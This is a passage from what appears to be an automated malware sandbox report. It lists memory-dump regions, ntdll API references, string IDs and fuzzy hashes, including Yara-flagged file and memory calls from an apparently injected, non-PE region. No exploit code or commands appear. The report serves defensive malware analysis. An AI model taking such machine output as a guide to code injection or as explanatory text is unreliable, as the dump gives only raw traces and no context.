                                      • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                      • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                      • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                      • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                      • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                      • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                      • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                      • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                      • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                      • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                      • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                      • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                      • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                      • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                      • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      • Kernel-MUI-Number-Allowed, xrefs: 00AF87E6
                                      • Kernel-MUI-Language-Allowed, xrefs: 00AF8827
                                      • Kernel-MUI-Language-SKU, xrefs: 00AF89FC
                                      • Kernel-MUI-Language-Disallowed, xrefs: 00AF8914
                                      • WindowsExcludedProcs, xrefs: 00AF87C1
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: _wcspbrk
                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                      • API String ID: 402402107-258546922
                                      • Opcode ID: 467db9de27376aaeb32e9e302d17db325c8eea333dd868a161f7fe90ec422136
                                      • Instruction ID: 5d767139f74d7be157c1bd0fb3527aa856e027e2c15ccd0644b7a8f30bfae5aa
                                      • Opcode Fuzzy Hash: 467db9de27376aaeb32e9e302d17db325c8eea333dd868a161f7fe90ec422136
                                      • Instruction Fuzzy Hash: 03F1D5B2D00249EFCF11EFD9CA819EEB7B9FB08304F15446AF606A7211EB359A45DB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: _wcsnlen
                                      • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                      • API String ID: 3628947076-1387797911
                                      • Opcode ID: dc51bc62b67d4b134f87cef44e56c2900db7057ea83137b35a8b65bf55498c85
                                      • Instruction ID: 46fda3354ee8204a6314435fbf0eacb7a53dc21debc32db52e4460694b2673ea
                                      • Opcode Fuzzy Hash: dc51bc62b67d4b134f87cef44e56c2900db7057ea83137b35a8b65bf55498c85
                                      • Instruction Fuzzy Hash: B341A875240219BAEB119A90DC82FDE77ECEF09B44F1042A2BA04E5191DFB4DB5197A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: ___swprintf_l
                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                      • API String ID: 48624451-2108815105
                                      • Opcode ID: 8ccce611d98d19fd06eda706218d71a56a1e180768ca71a046a66d9aabdc5993
                                      • Instruction ID: b66911016b5e55ddbcffd45bba9a6388ebaab6e140062be98a0be6b8b9fab70d
                                      • Opcode Fuzzy Hash: 8ccce611d98d19fd06eda706218d71a56a1e180768ca71a046a66d9aabdc5993
                                      • Instruction Fuzzy Hash: B2612971900655AACB24CF5DC8808FFBBF5EF94300B94C9AEE5E647680D734EA80CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: ___swprintf_l
                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                      • API String ID: 48624451-2108815105
                                      • Opcode ID: 835fba43edeb7fd2f3b2232495e303c7463b8271da2f16704e75d89010d7f719
                                      • Instruction ID: 1c076bb921a246187493cbdea9012c027dfcc01129800d62497278c8fc7239a9
                                      • Opcode Fuzzy Hash: 835fba43edeb7fd2f3b2232495e303c7463b8271da2f16704e75d89010d7f719
                                      • Instruction Fuzzy Hash: BE618072904748AFCB219F69C9404BA7BF5EF54710B14C5AAF8BE97141E234EB40EB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00B23F12
                                      Strings
                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00B23F4A
                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00B23EC4
                                      • Execute=1, xrefs: 00B23F5E
                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00B23F75
                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00B2E2FB
                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 00B2E345
                                      • ExecuteOptions, xrefs: 00B23F04
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: BaseDataModuleQuery
                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                      • API String ID: 3901378454-484625025
                                      • Opcode ID: a7551d934fe236a902e20621bf394e4ab4fcb09dd8213d537ef8e2777613c684
                                      • Instruction ID: 8032d25ab2e9afb4dd3a6f5a2246922e2e07de85c49d6a076c7e320ade8940eb
                                      • Opcode Fuzzy Hash: a7551d934fe236a902e20621bf394e4ab4fcb09dd8213d537ef8e2777613c684
                                      • Instruction Fuzzy Hash: D3418871A8025D7BDB20EA94ECD6FDAB3FCBB54700F0005E9B509E61C1EA70AB459B61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: __fassign
                                      • String ID: .$:$:
                                      • API String ID: 3965848254-2308638275
                                      • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                      • Instruction ID: d558425e207cb058b705e456671465b44d828559f74293a459486de45e4e498c
                                      • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                      • Instruction Fuzzy Hash: D0A1AE7192430ADFCF24EF64C8856EEBBF4EF15304F6485AAD412A7281D6B09AC1CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B32206
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                      • API String ID: 885266447-4236105082
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ___swprintf_l.LIBCMT ref: 00B3EA22
                                        • Part of subcall function 00B113CB: ___swprintf_l.LIBCMT ref: 00B1146B
                                        • Part of subcall function 00B113CB: ___swprintf_l.LIBCMT ref: 00B11490
                                      • ___swprintf_l.LIBCMT ref: 00B1156D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: ___swprintf_l
                                      • String ID: %%%u$]:%u
                                      • API String ID: 48624451-3050659472
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: ___swprintf_l
                                      • String ID: %%%u$]:%u
                                      • API String ID: 48624451-3050659472
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B322F4
                                      Strings
                                      • RTL: Re-Waiting, xrefs: 00B32328
                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00B322FC
                                      • RTL: Resource at %p, xrefs: 00B3230B
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                      • API String ID: 885266447-871070163
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • RTL: Re-Waiting, xrefs: 00B324FA
                                      • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00B324BD
                                      • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00B3248D
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                      • API String ID: 0-3177188983
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: __fassign
                                      • String ID:
                                      • API String ID: 3965848254-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: __aulldvrm
                                      • String ID: $$0
                                      • API String ID: 1302938615-389342756
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00ACFAE8: LdrInitializeThunk.NTDLL ref: 00ACFAF3
                                      • __aullrem.LIBCMT ref: 00AFB816
                                      • __aullrem.LIBCMT ref: 00AFB83D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      Similarity
                                      • API ID: __aullrem$InitializeThunk
                                      • String ID: s
                                      • API String ID: 241165383-3872074652
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,000A4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 000AA3BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,000A4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 000AA3BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 000AA465
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1J
                                      • API String ID: 2738559852-816519204
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 000AA465
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1J
                                      • API String ID: 2738559852-816519204
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtClose.NTDLL(PM,?,?,000A4D50,00000000,FFFFFFFF), ref: 000AA4C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID: PM
                                      • API String ID: 3535843008-922693620
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtClose.NTDLL(PM,?,?,000A4D50,00000000,FFFFFFFF), ref: 000AA4C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID: PM
                                      • API String ID: 3535843008-922693620
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000AA589
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Offset: 00090000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                      • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                      • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                      • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                      • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                      • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                      • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                      • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                      • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                      • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
